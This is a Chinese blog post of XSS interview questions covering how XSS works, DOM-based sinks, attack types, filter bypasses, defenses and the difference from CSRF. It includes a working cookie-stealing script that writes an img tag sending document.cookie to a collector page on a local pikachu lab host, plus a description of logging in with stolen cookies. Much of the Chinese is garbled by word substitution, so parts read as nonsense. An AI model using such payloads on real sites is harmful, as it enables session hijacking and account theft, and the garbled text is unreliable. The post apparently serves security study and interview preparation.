当前位置:首页 > 其他 > 正文内容

XSS常见问题

邻居的猫1个月前 (12-09)其他239
  • XSS原理
    web应用程序对输入和输出没有进行严厉过滤、进犯者能够刺进结构的歹意javascript脚本,当正常用户阅读网页时,被阅读器当作有用代码解析履行,盗取用户数据或履行其他歹意操作。

  • DOM型xss缝隙简单呈现的当地有哪些?
    1、能够被innerHTML或outerHTML特点修正的节点:节点假如没有对输入进行恰当的转义或整理就或许存在。
    2、能够刺进script标签特点的节点:如src、href、onerror、onclick等


    3、console.log()


    4、document.writer():运用 document.write 向页面中写入一个 img 标签, src拜访 cookie.php 并供给 cookie 参数为 document.cookie
    <script>document.write('<img src="http://127.0.0.1/pkxss/xcookie/cookie.php? cookie='+document.cookie+'"/>')</script>

  • XSS获取cookie后怎么使用
    经过burpsuite抓包、改包、使用成功获取到的cookie值进行登录。

  • XSS缝隙的分类
    反射型、存储型、DOM型
    反射型和DOM型都是一次的,反射型要发送到服务器读取,DOM型数据仅在前端解析,不发送到服务器
    存储型刺进到数据库,能够屡次使用,继续时间长
    反射型最多

  • XSS常见的使用方法
    使用XSS进行垂钓、盗取cookie信息、盗取用户身份信息进行非法操作、传达歹意代码

  • XSS常见绕过方法
    大小写、双写、编码、特点、javascript伪协议、

  • XSS或许存在点?
    一般涉及到数据交互的当地,服务器读取客户端提交的数据并回来读取到数据到前端HTML页面。如注册处、留言板、文章标题、谈论区、查询信息后回来前端显现
    个人信息、订单信息、查找框、表单、私信、定见反应、目录

  • XSS防护
    对输出编码、对输入过滤、设置白名单
    对cookie值设置Httponly特点
    DOM型对刺进HTML进行转义
    制止外联脚本和未授权脚本
    设置WAF防火墙

  • XSS与CSRF差异
    XSS是使用缝隙盗取用户权限进行进犯,不需求用户登录;CSRF需求在用户登录的情况下拐骗用户点击歹意链接,凭借用户的权限完结进犯,并没有拿到用户权限。

扫描二维码推送至手机访问。

版权声明:本文由51Blog发布,如需转载请注明出处。

本文链接:https://www.51blog.vip/?id=774

分享给朋友:

“XSS常见问题” 的相关文章

Java 面试用什么项目?满是商场秒杀 RPC,我吐了

Java 面试用什么项目?满是商场秒杀 RPC,我吐了

看了几百份简历,真的超越 90% 的小伙伴的项目是商城、RPC、秒杀、论坛、外卖、点评等等烂大街的项目,人人都知道这些项目烂大街了,但大部分同学仍是得硬着头皮做,没办法,网络上能找到的、教程比较完善的就这些项目了,做的话好歹有个项目,不做那就真能写校园做的废物学生办理体系了。 我深刻了解小伙伴的痛点...

华为校招三轮面经:通用软件开发工程师

华为校招三轮面经:通用软件开发工程师

  本文介绍2024届秋招中,华为技能有限公司的通用软件开发工程师岗位的3场面试根本状况、发问问题等。   2023年07月投递了华为技能有限公司的通用软件开发工程师岗位,地址部分为海思半导体与器材业务部。现在完结了一面、二面与三面等悉数流程,在这儿记载一下3场面试的阅历。此外,华为的校招流程的确十...

Redis常见面试题:ZSet底层数据结构,SDS、紧缩列表ZipList、跳表SkipList

Redis常见面试题:ZSet底层数据结构,SDS、紧缩列表ZipList、跳表SkipList

文章目录 一、Redis数据结构概述 1.1 Redis有哪些数据类型 1.2 Redis实质是哈希表 1.3 Redis的哈希抵触与渐进式rehash 1.4 数据结构底层 1.4.1 简略动态字符串SDS 1.4.2 双向链表LinkedList(后续已抛弃) 1.4.3 紧缩列表ZipList...

啥是区块链,什么是区块链?

区块链是一种分布式数据存储、点对点传输、共识机制、加密算法等计算机技术的新型应用模式。所谓共识机制是区块链系统中实现不同节点之间建立信任、获取权益的数学算法。区块链(Blockchain)是比特币的一个重要概念,它本质上是一个去中心化的数据库,同时作为比特币的底层技术。区块链是一串使用密码学方法相关...

区块链币,未来金融的基石

区块链币,也称为数字货币,是基于区块链技术的电子货币形式。区块链是一种去中心化、不可篡改的分布式账本技术,通过密码学、P2P网络、时间戳服务器和共识算法等技术,确保交易记录的安全性和透明性。 区块链币的基本概念1. 去中心化:区块链技术不依赖于单一的中心化机构或权威来验证和管理数据,而是由网络中的参...

云计算的技术特征,云计算技术特征

云计算的技术特征,云计算技术特征

云计算是一种基于互联网的计算方式,它允许用户按需访问共享的计算资源,包括服务器、存储、数据库、应用程序等。云计算的技术特征主要体现在以下几个方面:1. 资源池化:云计算将各种计算资源,如服务器、存储、网络等,进行集中管理和统一调度,形成资源池,用户可以根据需要从资源池中获取所需的资源。2. 按需自助...